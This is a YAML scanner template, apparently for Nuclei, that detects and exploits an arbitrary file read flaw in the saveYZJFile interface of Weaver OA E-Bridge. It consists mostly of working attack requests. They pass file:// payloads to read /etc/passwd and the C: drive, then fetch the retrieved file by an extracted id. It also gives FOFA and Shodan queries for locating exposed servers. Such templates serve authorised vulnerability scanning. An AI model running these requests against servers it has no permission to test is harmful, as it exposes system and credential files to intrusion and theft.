50 lines
1.5 KiB
YAML
50 lines
1.5 KiB
YAML
id: weaver-ebridge-lfi
|
|
|
|
info:
|
|
name: Weaver E-Bidge saveYZJFile - Local File Read
|
|
author: SleepingBag945
|
|
severity: high
|
|
description: |
|
|
There is an arbitrary file reading vulnerability in the Weaver OA E-Bridge saveYZJFile interface. An attacker can read any file on the server through the vulnerability.
|
|
reference:
|
|
- https://peiqi.wgpsec.org/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Bridge%20saveYZJFile%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html
|
|
metadata:
|
|
fofa-query: app="泛微云桥e-Bridge"
|
|
max-request: 4
|
|
shodan-query: eBridge_JSessionid
|
|
verified: true
|
|
tags: eBridge,weaver,oa,lfi,lfr,intrusive
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl={{path}} HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
- |
|
|
GET /file/fileNoLogin/{{idname}} HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
attack: pitchfork
|
|
payloads:
|
|
path:
|
|
- file:///C:/&fileExt=txt
|
|
- file:///etc/passwd&fileExt=txt
|
|
|
|
stop-at-first-match: true
|
|
skip-variables-check: true
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- "status_code_1 == 200 && contains_all(body_1,'id', 'filepath') && !contains(tolower(body), 'status\":\"error')"
|
|
- "status_code_2 == 200 && contains(header_2, 'filename=')"
|
|
- "contains(body_2, 'Program Files') || regex('root:.*:0:0:', body)"
|
|
condition: and
|
|
|
|
extractors:
|
|
- type: regex
|
|
name: idname
|
|
internal: true
|
|
group: 1
|
|
regex:
|
|
- '"id":"(.*?)"' |